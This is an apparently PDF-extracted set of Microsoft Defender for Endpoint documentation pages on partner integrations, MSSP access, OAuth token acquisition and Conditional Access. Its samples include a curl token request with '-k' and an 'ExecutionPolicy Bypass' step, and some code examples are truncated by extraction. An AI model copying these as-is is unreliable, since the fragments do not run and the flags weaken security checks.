indicators
Network security
ﾉ Expand table
Aruba ClearPass Policy Ensure Defender for Endpoint is installed and updated on
Manager each endpoint before allowing access to the network
Blue Hexagon for Blue Hexagon has built the industry's first real-time deep
Network learning platform for network threat protection
CyberMDX Cyber MDX integrates comprehensive healthcare assets

visibility, threat prevention and repose into your Defender
for Endpoint environment
HYAS Protect HYAS Protect utilizes authoritative knowledge of attacker

infrastructure to proactively protect Microsoft Defender for
Endpoint endpoints from cyberattacks
Vectra Network Vectra applies AI & security research to detect and

Detection and Response respond to cyber-attacks in real time
(NDR)
Cross platform
ﾉ Expand table
Bitdefender Bitdefender GravityZone is a layered next generation

endpoint protection platform offering comprehensive
protection against the full spectrum of sophisticated cyber
threats
Better Mobile AI-based MTD solution to stop mobile threats & phishing.
Private internet browsing to protect user privacy
Corrata Mobile solution - Protect your mobile devices with granular

visibility and control from Corrata
Lookout Get Lookout Mobile Threat Protection telemetry for Android

and iOS mobile devices
Symantec Endpoint SEP Mobile helps businesses predict, detect, and prevent
Protection Mobile security threats and vulnerabilities on mobile devices
Zimperium Extend your Defender for Endpoint to iOS and Android with
Machine Learning-based Mobile Threat Defense
Other integrations
ﾉ Expand table
Logo Partner Description
name
Cyren Web Enhance your Defender for Endpoint with advanced Web Filtering
Filter
Morphisec Provides Moving Target Defense-powered advanced threat

prevention. Integrates forensics data directly into WD Defender for
Cloud dashboards to help prioritize alerts, determine device at-risk
score and visualize full attack timeline including internal memory
information
THOR Cloud Provides on-demand live forensics scans using a signature base with
focus on persistent threats
SIEM integration
Defender for Endpoint supports SIEM integration through various of methods. This can
include specialized SIEM system interface with out of the box connectors, a generic alert
API enabling custom implementations, and an action API enabling alert status
management.
Ticketing and IT service management

Ticketing solution integration helps to implement manual and automatic response
processes. Defender for Endpoint can help to create tickets automatically when an alert
is generated and resolve the alerts when tickets are closed using the alerts API.
Security orchestration and automation

response (SOAR) integration
Orchestration solutions can help build playbooks and integrate the rich data model and
actions that Defender for Endpoint APIs exposes to orchestrate responses, such as query
for device data, trigger device isolation, block/allow, resolve alert and others.
External alert correlation and Automated

investigation and remediation
Defender for Endpoint offers unique automated investigation and remediation
capabilities to drive incident response at scale.
Integrating the automated investigation and response capability with other solutions
such as IDS and firewalls help to address alerts and minimize the complexities
surrounding network and device signal correlation, effectively streamlining the
investigation and threat remediation actions on devices.
External alerts can be pushed to Defender for Endpoint. These alerts are shown side by
side with additional device-based alerts from Defender for Endpoint. This view provides
a full context of the alert and can reveal the full story of an attack.
Indicators matching
You can use threat-intelligence from providers and aggregators to maintain and use
indicators of compromise (IOCs).
Defender for Endpoint allows you to integrate with these solutions and act on IoCs by
correlating rich telemetry to create alerts. You can also use prevention and automated
response capabilities to block execution and take remediation actions when there's a
match.
Defender for Endpoint currently supports IOC matching and remediation for file and
network indicators. Blocking is supported for file indicators.
Support for non-Windows platforms

Defender for Endpoint provides a centralized security operations experience for
Windows and non-Windows platforms, including mobile devices. You'll be able to see
alerts from various supported operating systems (OS) in the portal and better protect
your organization's network.
 Tip
Feedback

Connected applications in Microsoft
Article • 10/20/2023
Applies to:

Connected applications integrates with the Defender for Endpoint platform using APIs.
Applications use standard OAuth 2.0 protocol to authenticate and provide tokens for
use with Microsoft Defender for Endpoint APIs. In addition, Microsoft Entra applications
allow tenant admins to set explicit control over which APIs can be accessed using the
corresponding app.
You'll need to follow these steps to use the APIs with the connected application.
From the left navigation menu, select Partners & APIs (under Endpoints) > Connected
applications.
View connected application details

The Connected applications page provides information about the Microsoft Entra
applications connected to Microsoft Defender for Endpoint in your organization. You
can review the usage of the connected applications: last seen, number of requests in the
past 24 hours, and request trends in the last 30 days.
Edit, reconfigure, or delete a connected

application
The Open application settings link opens the corresponding Microsoft Entra application
management page in the Azure portal. From the Azure portal, you can manage
permissions, reconfigure, or delete the connected applications.
 Tip
Feedback

API Explorer
Article • 09/27/2023
Applies to:
The Microsoft Defender for Endpoint API Explorer is a tool that helps you explore
various Defender for Endpoint APIs interactively.
The API Explorer makes it easy to construct and do API queries, test, and send requests
for any available Defender for Endpoint API endpoint. Use the API Explorer to take
actions or find data that might not yet be available through the user interface.
The tool is useful during app development. It allows you to perform API queries that
respect your user access settings, reducing the need to generate access tokens.
You can also use the tool to explore the gallery of sample queries, copy result code
samples, and generate debug information.
With the API Explorer, you can:
Run requests for any method and see responses in real-time.

Quickly browse through the API samples and learn what parameters they support.
Make API calls with ease; no need to authenticate beyond the management portal
signin.
Access API Explorer

From the left navigation menu, select Partners & APIs > API Explorer .
Supported APIs
API Explorer supports all the APIs offered by Defender for Endpoint.
The list of supported APIs is available in the APIs documentation.
Get started with the API Explorer

1. In the left pane, there's a list of sample requests that you can use.
2. Follow the links and click Run query.
Some of the samples may require specifying a parameter in the URL, for example,
{machine- ID}.
FAQ
Do I need to have an API token to use the API Explorer?
Credentials to access an API aren't needed. The API Explorer uses the Defender for
Endpoint management portal token whenever it makes a request.
The logged-in user authentication credential is used to verify that the API Explorer is
authorized to access data on your behalf.
Specific API requests are limited based on your RBAC privileges. For example, a request
to "Submit indicator" is limited to the security admin role.
 Tip
Feedback

Configure managed security service
provider integration
Article • 02/16/2024
Applies to:

） Important

To enable the managed security service provider (MSSP) integration, follow the guidance
in this article.
７ Note
The following terms are used in this article to distinguish between the service
provider and service consumer:
MSSPs: Security organizations that offer to monitor and manage security

devices for an organization.
MSSP customers: Organizations that engage the services of MSSPs.
The integration allows MSSPs to take the following actions:
Get access to MSSP customer's Microsoft Defender portal

Get email notifications, and
Fetch alerts through security information and event management (SIEM) tools
Before MSSPs can take these actions, the MSSP customer needs to grant access to their
Defender for Endpoint tenant so that the MSSP can access the portal.
Typically, MSSP customers take the initial configuration steps to grant MSSPs access to
their Windows Defender Security Central tenant. After access is granted, the MSSP or
customer can do the other configuration steps. In general, these are the configuration
steps to complete:
ﾉ Expand table
Step Who does it
Grant the MSSP access to Microsoft Defender XDR. This action grants the MSSP Customer
MSSP access to the MSSP customer's Defender for Endpoint tenant.
Configure alert notifications sent to MSSPs. This action lets the MSSPs know MSSP customer
what alerts they need to address for the MSSP customer. or MSSP
Fetch alerts from MSSP customer's tenant into SIEM system. This action MSSP
allows MSSPs to fetch alerts in SIEM tools.
Fetch alerts from MSSP customer's tenant using APIs. This action allows MSSP
MSSPs to fetch alerts using APIs.
Multi-tenant access for MSSPs

For information on how to implement a multitenant delegated access, see Multi-tenant
access for Managed Security Service Providers .
Related articles
Grant MSSP access to the portal
Access the MSSP customer portal
Fetch alerts from customer tenant
 Tip
Feedback

Grant managed security service provider
(MSSP) access (preview)
Article • 02/21/2024
Applies to:

） Important

To implement a multitenant delegated access solution, take the following steps:
1. Enable role-based access control in Defender for Endpoint and connect with Active
Directory (AD) groups.
2. Configure Governance Access Packages for access request and provisioning.
3. Manage access requests and audits in Microsoft Myaccess.
Enable role-based access controls in Microsoft

1. Create access groups for MSSP resources in Customer AAD: Groups
These groups are linked to the Roles you create in Defender for Endpoint. To do so,
in the customer AD tenant, create three groups. In our example approach, we
create the following groups:
Tier 1 Analyst
Tier 2 Analyst
MSSP Analyst Approvers
2. Create Defender for Endpoint roles for appropriate access levels in Customer
To enable RBAC in the customer Microsoft Defender portal, access Settings >
Endpoints > Permissions > Roles and "Turn on roles", from a user account with
Global Administrator or Security Administrator rights.
Then, create RBAC roles to meet MSSP SOC Tier needs. Link these roles to the
created user groups via "Assigned user groups".
Two possible roles:
Tier 1 Analysts
Perform all actions except for live response and manage security settings.
Tier 2 Analysts
Tier 1 capabilities with the addition to live response
For more information, see Use role-based access control.
Configure Governance Access Packages

1. Add MSSP as Connected Organization in Customer AAD: Identity Governance
Adding the MSSP as a connected organization allows the MSSP to request and
have accesses provisioned.
To do so, in the customer AD tenant, access Identity Governance: Connected

organization. Add a new organization and search for your MSSP Analyst tenant via
Tenant ID or Domain. We suggest creating a separate AD tenant for your MSSP
Analysts.
2. Create a resource catalog in Customer AAD: Identity Governance
Resource catalogs are a logical collection of access packages, created in the

customer AD tenant.
To do so, in the customer AD tenant, access Identity Governance: Catalogs, and

add New Catalog. In our example, it's called, MSSP Accesses.

Further more information, see Create a catalog of resources.
3. Create access packages for MSSP resources Customer AAD: Identity Governance
Access packages are the collection of rights and accesses that a requestor is
granted upon approval.
To do so, in the customer AD tenant, access Identity Governance: Access Packages,

and add New Access Package. Create an access package for the MSSP approvers
and each analyst tier. For example, the following Tier 1 Analyst configuration
creates an access package that:
Requires a member of the AD group MSSP Analyst Approvers to authorize

new requests
Has annual access reviews, where the SOC analysts can request an access
extension
Can only be requested by users in the MSSP SOC Tenant
Access auto expires after 365 days

For more information, see Create a new access package.
4. Provide access request link to MSSP resources from Customer AAD: Identity
Governance
The My Access portal link is used by MSSP SOC analysts to request access via the
access packages created. The link is durable, meaning the same link may be used
over time for new analysts. The analyst request goes into a queue for approval by
the MSSP Analyst Approvers.
The link is located on the overview page of each access package.
Manage access
1. Review and authorize access requests in Customer and/or MSSP myaccess.
Access requests are managed in the customer My Access, by members of the

MSSP Analyst Approvers group.
To do so, access the customer's myaccess using:

https://myaccess.microsoft.com/@<Customer Domain> .
Example: https://myaccess.microsoft.com/@M365x440XXX.onmicrosoft.com#/
2. Approve or deny requests in the Approvals section of the UI.
At this point, analyst access has been provisioned, and each analyst should be able
to access the customer's Microsoft Defender portal:
https://security.microsoft.com/?tid=<CustomerTenantId>
Related topics
 Tip
Feedback

Access the Microsoft Defender XDR
MSSP customer portal
Article • 10/20/2023
Applies to:

） Important

７ Note
These set of steps are directed towards the MSSP.
By default, MSSP customers access their Microsoft Defender XDR tenant through the
following URL: https://security.microsoft.com/ .
MSSPs however, will need to use a tenant-specific URL in the following format:
https://security.microsoft.com?tid=customer_tenant_id to access the MSSP customer
portal.
In general, MSSPs will need to be added to each of the MSSP customer's Microsoft Entra
ID that they intend to manage.
Use the following steps to obtain the MSSP customer tenant ID and then use the ID to
access the tenant-specific URL:
1. As an MSSP, log in to Microsoft Entra ID with your credentials.

2. Switch directory to the MSSP customer's tenant.
3. Select Microsoft Entra ID > Properties. You'll find the tenant ID in the Tenant ID
field.
4. Access the MSSP customer portal by replacing the customer_tenant_id value in the
following URL: https://security.microsoft.com/?tid=customer_tenant_id .
5. Access a Unified View for MSSP (Preview) in https://mto.security.microsoft.com/
Related topics
 Tip
Feedback

Configure alert notifications that are
sent to MSSPs
Article • 07/18/2023
Applies to:

７ Note
This step can be done by either the MSSP customer or MSSP. MSSPs must be
granted the appropriate permissions to configure this on behalf of the MSSP
customer.
After access the portal is granted, alert notification rules can be created so that emails
are sent to MSSPs when alerts associated with the tenant are created and set conditions
are met.
For more information, see Create rules for alert notifications.
These check boxes must be checked:
Include organization name - The customer name will be added to email

notifications
Include tenant-specific portal link - Alert link URL will have tenant specific
parameter (tid=target_tenant_id) that allows direct access to target tenant portal
Related topics
 Tip
Feedback

Partner access through Microsoft
Article • 02/23/2024
Applies to:

） Important
７ Note
 Tip
This page describes how to create a Microsoft Entra application to get programmatic
access to Microsoft Defender for Endpoint on behalf of your customers.
programmatic APIs. Those APIs help you automate work flows and innovate based on
Microsoft Defender for Endpoint capabilities. The API access requires OAuth2.0
authentication. For more information, see OAuth 2.0 Authorization Code Flow.
In general, you need to take the following steps to use the APIs:
Create a multi-tenant Microsoft Entra application.

Get authorized(consent) by your customer administrator for your application to
access Defender for Endpoint resources it needs.
Get an access token using this application.
Use the token to access Microsoft Defender for Endpoint API.
The following steps guide you how to create a Microsoft Entra application, get an access
token to Microsoft Defender for Endpoint and validate the token.
Create the multitenant app

1. Sign in to your Azure tenant with user that has Global Administrator role.
3. In the registration form:
Choose a name for your application.
Supported account types - accounts in any organizational directory.
Redirect URI - type: Web, URI: https://portal.azure.com


4. Allow your Application to access Microsoft Defender for Endpoint and assign it
with the minimal set of permissions required to complete the integration.
On your application page, select API Permissions > Add permission > APIs
my organization uses > type WindowsDefenderATP and select on
WindowsDefenderATP.
Note that WindowsDefenderATP doesn't appear in the original list. Start

writing its name in the text box to see it appear.

Request API permissions

To determine which permission you need, review the Permissions section in the API
you're interested to call. For instance:
To run advanced queries, select 'Run advanced queries' permission

To isolate a device, select 'Isolate machine' permission
In the following example we use 'Read all alerts' permission:
1. Choose Application permissions > Alert.Read.All > select on Add permissions


2. Select Grant consent
Note: Every time you add permission you must select on Grant consent for
the new permission to take effect.
3. Add a secret to the application.
Select Certificates & secrets, add description to the secret and select Add.
Important: After you select Add, make sure to copy the generated secret value.
You won't be able to retrieve it after you leave!

4. Write down your application ID:
On your application page, go to Overview and copy the following

information:
5. Add the application to your customer's tenant.
You need your application to be approved in each customer tenant where you
intend to use it. This approval is necessary because your application interacts with
Microsoft Defender for Endpoint application on behalf of your customer.
A user with Global Administrator from your customer's tenant need to select the
consent link and approve your application.
Consent link is of the form:
HTTP
https://login.microsoftonline.com/common/oauth2/authorize?
prompt=consent&client_id=00000000-0000-0000-0000-
000000000000&response_type=code&sso_reload=true
Where 00000000-0000-0000-0000-000000000000 should be replaced with your

Application ID
After clicking on the consent link, sign in with the Global Administrator of the
customer's tenant and consent the application.
In addition, you'll need to ask your customer for their tenant ID and save it for
future use when acquiring the token.
6. Done! You successfully registered an application! See the following examples for
token acquisition and validation.
Get an access token example

Note: To get access token on behalf of your customer, use the customer's tenant ID on
the following token acquisitions.
For more information on Microsoft Entra token, see Microsoft Entra tutorial.
Using PowerShell
PowerShell
# That code gets the App Context Token and save it to a file named "Latest-
token.txt" under the current directory
# Paste below your Tenant ID, App ID and App Secret (App key).

$appSecret = '' ### Paste your Application key here
}
Out-File -FilePath "./Latest-token.txt" -InputObject $token
return $token
Using C#
The below code was tested with Nuget Microsoft.Identity.Client
） Important
The Microsoft.IdentityModel.Clients.ActiveDirectory NuGet package and Azure

AD Authentication Library (ADAL) have been deprecated. No new features have
been added since June 30, 2020. We strongly encourage you to upgrade, see the
migration guide for more details.
Create a new Console Application
Install NuGet Microsoft.Identity.Client
Add the below using
Console
using Microsoft.Identity.Client;
Copy/Paste the below code in your application (don't forget to update the three
variables: tenantId , appId , and appSecret )
C#
string tenantId = "00000000-0000-0000-0000-000000000000"; // Paste your

own tenant ID here
string appId = "11111111-1111-1111-1111-111111111111"; // Paste your
own app ID here
string appSecret = "22222222-2222-2222-2222-222222222222"; // Paste
your own app secret here for a test, and then store it in a safe place!
const string authority = https://login.microsoftonline.com;
const string audience = https://api.securitycenter.microsoft.com;
IConfidentialClientApplication myApp =
ConfidentialClientApplicationBuilder.Create(appId).WithClientSecret(app
Secret).WithAuthority($"{authority}/{tenantId}").Build();
List<string> scopes = new List<string>() { $"{audience}/.default" };
AuthenticationResult authResult =
myApp.AcquireTokenForClient(scopes).ExecuteAsync().GetAwaiter().GetResu
lt();
string token = authResult.AccessToken;
Using Python
Refer to Get token using Python.
Using Curl
７ Note
The below procedure supposed Curl for Windows is already installed on your
computer
1. Open a command window.
2. Set CLIENT_ID to your Azure application ID.
3. Set CLIENT_SECRET to your Azure application secret.
4. Set TENANT_ID to the Azure tenant ID of the customer that wants to use your
application to access Microsoft Defender for Endpoint application.
5. Run the following command:
curl
curl -i -X POST -H "Content-Type:application/x-www-form-urlencoded" -d

"grant_type=client_credentials" -d "client_id=%CLIENT_ID%" -d
"scope=https://securitycenter.onmicrosoft.com/windowsatpservice/.defaul
t" -d "client_secret=%CLIENT_SECRET%"
"https://login.microsoftonline.com/%TENANT_ID%/oauth2/v2.0/token" -k
You get an answer of the form:
Console
{"token_type":"Bearer","expires_in":3599,"ext_expires_in":0,"access_tok
en":"eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsIn <truncated>
aWReH7P0s0tjTBX8wGWqJUdDA"}
Validate the token

Confirm you received a correct token.
1. Copy/paste into JWT the token you get in the previous step in order to decode
it.
2. Confirm you get a 'roles' claim with the desired permissions.
In the following screenshot, you can see a decoded token acquired from an
Application with multiple permissions to Microsoft Defender for Endpoint:
The "tid" claim is the tenant ID the token belongs to.



Endpoint API
1. Choose the API you want to use. For more information, see Supported Microsoft
Defender for Endpoint APIs.
2. Set the Authorization header in the Http request you send to "Bearer {token}"
(Bearer is the Authorization scheme). The Expiration time of the token is 1 hour
(you can send more than one request with the same token).
Here's an example of sending a request to get a list of alerts using C#
C#


token);
See also
Supported Microsoft Defender for Endpoint APIs
Access Microsoft Defender for Endpoint on behalf of a user
 Tip
Feedback

Fetch alerts from MSSP customer tenant
Article • 11/15/2023
Applies to:

７ Note
This action is taken by the MSSP.
There are two ways you can fetch alerts:
Using the SIEM method

Using APIs
Fetch alerts into your SIEM

To fetch alerts into your SIEM system, you'll need to take the following steps:
Step 1: Create a third-party application

Step 2: Get access and refresh tokens from your customer's tenant
Step 3: allow your application on Microsoft Defender XDR
Step 1: Create an application in Microsoft Entra ID

You'll need to create an application and grant it permissions to fetch alerts from your
customer's Microsoft Defender XDR tenant.
1. Sign in to the Microsoft Entra admin center .
2. Select Microsoft Entra ID > App registrations.
3. Click New registration.
4. Specify the following values:
Name: <Tenant_name> SIEM MSSP Connector (replace Tenant_name with the

tenant display name)
Supported account types: Account in this organizational directory only
Redirect URI: Select Web and type

https://<domain_name>/SiemMsspConnector (replace <domain_name> with the
tenant name)
5. Click Register. The application is displayed in the list of applications you own.
6. Select the application, then click Overview.
7. Copy the value from the Application (client) ID field to a safe place, you will need
this in the next step.
8. Select Certificate & secrets in the new application panel.
9. Click New client secret.
Description: Enter a description for the key.

Expires: Select In 1 year
10. Click Add, copy the value of the client secret to a safe place, you will need this in
the next step.
Step 2: Get access and refresh tokens from your

customer's tenant
This section guides you on how to use a PowerShell script to get the tokens from your
customer's tenant. This script uses the application from the previous step to get the
access and refresh tokens using the OAuth Authorization Code Flow.
After providing your credentials, you'll need to grant consent to the application so that
the application is provisioned in the customer's tenant.
1. Create a new folder and name it: MsspTokensAcquisition .
2. Download the LoginBrowser.psm1 module and save it in the

MsspTokensAcquisition folder.
７ Note
In line 30, replace authorzationUrl with authorizationUrl .
3. Create a file with the following content and save it with the name
MsspTokensAcquisition.ps1 in the folder:
PowerShell
param (
[Parameter(Mandatory=$true)][string]$clientId,
[Parameter(Mandatory=$true)][string]$secret,
[Parameter(Mandatory=$true)][string]$tenantId
)
[Net.ServicePointManager]::SecurityProtocol =
[Net.SecurityProtocolType]::Tls12
# Load our Login Browser Function

Import-Module .\LoginBrowser.psm1
# Configuration parameters
$login = "https://login.microsoftonline.com"
$redirectUri = "https://SiemMsspConnector"
$resourceId = "https://graph.windows.net"
Write-Host 'Prompt the user for his credentials, to get an

authorization code'
$authorizationUrl = ("{0}/{1}/oauth2/authorize?
prompt=select_account&response_type=code&client_id={2}&redirect_uri=
{3}&resource={4}" -f
$login, $tenantId, $clientId, $redirectUri,
$resourceId)
Write-Host "authorzationUrl: $authorizationUrl"
# Fake a proper endpoint for the Redirect URI

$code = LoginBrowser $authorizationUrl $redirectUri
# Acquire token using the authorization code
$Body = @{
grant_type = 'authorization_code'
client_id = $clientId
code = $code
redirect_uri = $redirectUri
resource = $resourceId
client_secret = $secret
}
$tokenEndpoint = "$login/$tenantId/oauth2/token?"
$Response = Invoke-RestMethod -Method Post -Uri $tokenEndpoint -Body
$Body
$token = $Response.access_token
$refreshToken= $Response.refresh_token
Write-Host " ----------------------------------- TOKEN ----------------

------------------ "
Write-Host $token
Write-Host " ----------------------------------- REFRESH TOKEN --------

-------------------------- "
Write-Host $refreshToken
4. Open an elevated PowerShell command prompt in the MsspTokensAcquisition

folder.
5. Run the following command: Set-ExecutionPolicy -ExecutionPolicy Bypass
6. Enter the following commands: .\MsspTokensAcquisition.ps1 -clientId

<client_id> -secret <app_key> -tenantId <customer_tenant_id>
Replace <client_id> with the Application (client) ID you got from the
previous step.
Replace <app_key> with the Client Secret you created from the previous
step.
Replace <customer_tenant_id> with your customer's Tenant ID.
7. You'll be asked to provide your credentials and consent. Ignore the page redirect.
8. In the PowerShell window, you'll receive an access token and a refresh token. Save
the refresh token to configure your SIEM connector.
Step 3: Allow your application on Microsoft Defender

XDR
You'll need to allow the application you created in Microsoft Defender XDR.
You'll need to have Manage portal system settings permission to allow the application.
Otherwise, you'll need to request your customer to allow the application for you.
1. Go to https://security.microsoft.com?tid=<customer_tenant_id> (replace
<customer_tenant_id> with the customer's tenant ID.
2. Click Settings > Endpoints > APIs > SIEM.
3. Select the MSSP tab.
4. Enter the Application ID from the first step and your Tenant ID.
5. Click Authorize application.
You can now download the relevant configuration file for your SIEM and connect to the
Microsoft Defender XDR API. For more information, see, Pull alerts to your SIEM tools.
In the ArcSight configuration file / Splunk Authentication Properties file, write your
application key manually by setting the secret value.
Instead of acquiring a refresh token in the portal, use the script from the previous
step to acquire a refresh token (or acquire it by other means).
Fetch alerts from MSSP customer's tenant

using APIs
For information on how to fetch alerts using REST API, see Fetch alerts from MSSP
customer tenant.
See also
 Tip
Feedback

Managed security service provider
partnership opportunities
Article • 07/18/2023
Applies to:

Security is recognized as a key component in running an enterprise, however some

organizations might not have the capacity or expertise to have a dedicated security
operations team to manage the security of their endpoints and network, others may
want to have a second set of eyes to review alerts in their network.
To address this demand, managed security service providers (MSSP) offer to deliver
managed detection and response (MDR) services on top of Defender for Endpoint.
Defender for Endpoint adds partnership opportunities for this scenario and allows
MSSPs to take the following actions:
Get access to MSSP customer's Microsoft Defender portal

Get email notifications, and
Fetch alerts through security information and event management (SIEM) tools
Related topic
Configure managed security service provider integration
 Tip
Feedback

partner opportunities and scenarios
Article • 02/22/2024
Applies to:

Partners can easily extend their existing security offerings on top of the open framework
and a rich and complete set of APIs to build extensions and integrations with Defender
for Endpoint.
The APIs span functional areas including detection, management, response,

vulnerabilities, and intelligence-wide range of use cases. Based on the use case and
need, partners can either stream or query data from Defender for Endpoint.
Scenario 1: External alert correlation and

Defender for Endpoint offers unique automated investigation and remediation
capabilities to drive incident response at scale.
Integrating the automated investigation and response capability with other solutions
such as network security products or other endpoint security products help to address
alerts. The integration also minimizes the complexities surrounding network and device
signal correlation, effectively streamlining the investigation and threat remediation
actions on devices.
Defender for Endpoint adds support for this scenario in the following forms:
External alerts can be pushed into Defender for Endpoint and presented side by
side with additional device-based alerts from Defender for Endpoint. This view
provides the full context of the alert - with the real process and the full story of
attack.
Once an alert is generated, the signal is shared across all Defender for Endpoint
protected endpoints in the enterprise. Defender for Endpoint takes immediate
automated or operator-assisted response to address the alert.
Scenario 2: Security orchestration and

automation response (SOAR) integration
Orchestration solutions can help build playbooks and integrate the rich data model and
actions that Defender for Endpoint APIs expose to orchestrate responses, such as query
for device data, trigger device isolation, block/allow, resolve alert, and others.
Scenario 3: Indicators matching

protection solution. This capability is available in Defender for Endpoint and gives the
ability to set a list of indicators for prevention, detection, and exclusion of entities. One
can define the action to be taken as well as the duration for when to apply the action.
The above scenarios serve as examples of the extensibility of the platform. You aren't
limited to the examples and we certainly encourage you to use the open framework to
discover and explore other scenarios.
Follow the steps in Become a Microsoft Defender for Endpoint partner to integrate your
solution in Defender for Endpoint.
Related article
Overview of management and APIs
 Tip
Feedback
Become a Microsoft Defender for
Endpoint partner
Article • 02/21/2024
Applies to:

To become a Defender for Endpoint solution partner, complete steps outlined in this
article.
Step 1: Subscribe to a Microsoft Defender for

Endpoint license
Want to experience Defender for Endpoint? Sign up for a free trial. . Subscribing allows
you to use a Microsoft Defender for Endpoint tenant with up to three devices to
developing solutions that integrate with Microsoft Defender for Endpoint.
Step 2: Fulfill the solution validation and

certification requirements
The best way for technology partners to certify that their integration works is to have a
joint customer approve the suggested integration design in the Partner Application
page in Microsoft Defender XDR and have it tested and demoed to the Microsoft
Defender for Endpoint team.
Once the Microsoft Defender for Endpoint team reviews and approves the integration,
we direct you to be included as a partner at the Microsoft Intelligent Security
Association.
Step 3: Get listed in the Microsoft Defender for

Endpoint partner application portal
Microsoft Defender for Endpoint supports non-Microsoft applications discovery and
integration using the in-product partner page that is embedded within the Microsoft
Defender for Endpoint management portal.
To have your company listed as a partner in the in-product partner page, provide the
following information:
A square logo (SVG)
Name of the product to be presented
A 15-word product description
A link to the landing page for the customer to complete the integration or blog
post that includes sufficient information for customers. Any press release including
the Microsoft Defender for Endpoint product name should be reviewed by the
marketing and engineering teams. Wait for at least 10 days for the review process
to be done.
If you use a multi-tenant Microsoft Entra ID approach, we need the Microsoft Entra
application name to track usage of the application.
The User-Agent field in each API call to the Defender for Endpoint public set of
APIs or Graph Security APIs. This is used for statistical purposes, troubleshooting,
and partner recognition. In addition, this step is a requirement for membership in
Microsoft Intelligent Security Association (MISA).
Follow these steps:
Set the User-Agent field in each HTTP request header to the below format.
HTTP
MdePartner-{CompanyName}-{ProductName}/{Version}
For example, User-Agent:
HTTP
MdePartner-Contoso-ContosoCognito/1.0.0
For more information, see RFC 2616 section-14.43 .
Partnerships with Microsoft Defender for Endpoint help our mutual customers to further
streamline, integrate, and orchestrate defenses. Thank you for choosing to become a
Microsoft Defender for Endpoint partner and to achieve our common goal of effectively
protecting customers and their assets by preventing and responding to modern threats
together.
MISA nomination
Managed security service providers (MSSP) and independent software vendors (ISV) can
be nominated to the Microsoft Intelligent Security Association (MISA). For more
information, see MISA information page .
Related articles
Technical partner opportunities
 Tip
Feedback

Microsoft Defender for Endpoint and
other Microsoft solutions
Article • 11/15/2023
Applies to:

Integrate with other Microsoft solutions

Microsoft Defender for Endpoint directly integrates with various Microsoft solutions.

Microsoft Defender for Cloud provides a comprehensive server protection solution,
including endpoint detection and response (EDR) capabilities on Windows Servers.
Microsoft Sentinel
The Microsoft Defender for Endpoint connector lets you stream alerts from Microsoft
Defender for Endpoint into Microsoft Sentinel. This will enable you to more
comprehensively analyze security events across your organization and build playbooks
for effective and immediate response.
Azure Information Protection

We recently deprecated the Azure Information Protection integration as our Endpoint
DLP capabilities incorporate an improved discovery and protection solution for sensitive
data stored on endpoint devices that facilitates greater visibility and integration
between solutions. This was announced in the following blog . We recommend that
customers move to using Endpoint DLP.
Conditional Access
Microsoft Defender for Endpoint's dynamic device risk score is integrated into the
Conditional Access evaluation, ensuring that only secure devices have access to
resources.

Microsoft Defender for Cloud Apps leverages Microsoft Defender for Endpoint signals to
allow direct visibility into cloud application usage including the use of unsupported
cloud services (shadow IT) from all Microsoft Defender for Endpoint monitored devices.

Suspicious activities are processes running under a user context. The integration
between Microsoft Defender for Endpoint and Microsoft Defender for Identity provides
the flexibility of conducting cyber security investigation across activities and identities.
Microsoft Defender for Office

Defender for Office 365 helps protect your organization from malware in email
messages or files through Safe Links, Safe Attachments, advanced Anti-Phishing, and
spoof intelligence capabilities. The integration between Microsoft Defender for Office
365 and Microsoft Defender for Endpoint enables security analysts to go upstream to
investigate the entry point of an attack. Through threat intelligence sharing, attacks can
be contained and blocked.
７ Note
Defender for Office 365 data is displayed for events within the last 30 days. For
alerts, Defender for Office 365 data is displayed based on first activity time. After
that, the data is no longer available in Defender for Office 365.
Skype for Business

The Skype for Business integration provides a way for analysts to communicate with a
potentially compromised user or device owner through a simple button from the portal.

With Microsoft Defender XDR, Microsoft Defender for Endpoint, and various Microsoft
security solutions form a unified pre- and post-breach enterprise defense suite that
natively integrates across endpoint, identity, email, and applications to detect, prevent,
Learn more about Microsoft Defender XDR
Related topics
Configure integration and other advanced features
Microsoft Defender XDR overview
Turn on Microsoft Defender XDR
Protect users, data, and devices with Conditional Access
 Tip
Feedback

Enable Conditional Access to better
protect users, devices, and data
Article • 10/20/2023
Applies to:

Conditional Access is a capability that helps you better protect your users and enterprise
information by making sure that only secure devices have access to applications.
https://www.microsoft.com/en-us/videoplayer/embed/RE4byD1?postJsllMsg=true
With Conditional Access, you can control access to enterprise information based on the
risk level of a device. This helps keep trusted users on trusted devices using trusted
applications.
You can define security conditions under which devices and applications can run and
access information from your network by enforcing policies to stop applications from
running until a device returns to a compliant state.
The implementation of Conditional Access in Defender for Endpoint is based on

Microsoft Intune (Intune) device compliance policies and Microsoft Entra Conditional
Access policies.
The compliance policy is used with Conditional Access to allow only devices that fulfill
one or more device compliance policy rules to access applications.
Understand the Conditional Access flow

Conditional Access is put in place so that when a threat is seen on a device, access to
sensitive content is blocked until the threat is remediated.
The flow begins with devices being seen to have a low, medium, or high risk. These risk
determinations are then sent to Intune.
Depending on how you configure policies in Intune, Conditional Access can be set up so
that when certain conditions are met, the policy is applied.
For example, you can configure Intune to apply Conditional Access on devices that have
a high risk.
In Intune, a device compliance policy is used with Microsoft Entra Conditional Access to
block access to applications. In parallel, an automated investigation and remediation
process is launched.
A user can still use the device while the automated investigation and remediation is
taking place, but access to enterprise data is blocked until the threat is fully remediated.
To resolve the risk found on a device, you need to return the device to a compliant state.
A device returns to a compliant state when there's no risk seen on it.
There are three ways to address a risk:
1. Use Manual or automated remediation.

2. Resolve active alerts on the device. This removes the risk from the device.
3. You can remove the device from the active policies and consequently, Conditional
Access won't be applied on the device.
Manual remediation requires a secops admin to investigate an alert and address the risk
seen on the device. The automated remediation is configured through configuration
settings provided in the following section, Configure Conditional Access.
When the risk is removed either through manual or automated remediation, the device
returns to a compliant state and access to applications is granted.
The following example sequence of events explains Conditional Access in action:
1. A user opens a malicious file and Defender for Endpoint flags the device as high
risk.
2. The high risk assessment is passed along to Intune. In parallel, an automated
investigation is initiated to remediate the identified threat. A manual remediation
can also be done to remediate the identified threat.
3. Based on the policy created in Intune, the device is marked as not compliant. The
assessment is then communicated to Microsoft Entra ID by the Intune Conditional
Access policy. In Microsoft Entra ID, the corresponding policy is applied to block
access to applications.
4. The manual or automated investigation and remediation is completed and the
threat is removed. Defender for Endpoint sees that there's no risk on the device
and Intune assesses the device to be in a compliant state. Microsoft Entra ID
applies the policy, which allows access to applications.
5. Users can now access applications.
Related topic
Configure Conditional Access in Microsoft Defender for Endpoint
 Tip
Feedback

Microsoft Defender for Cloud Apps in
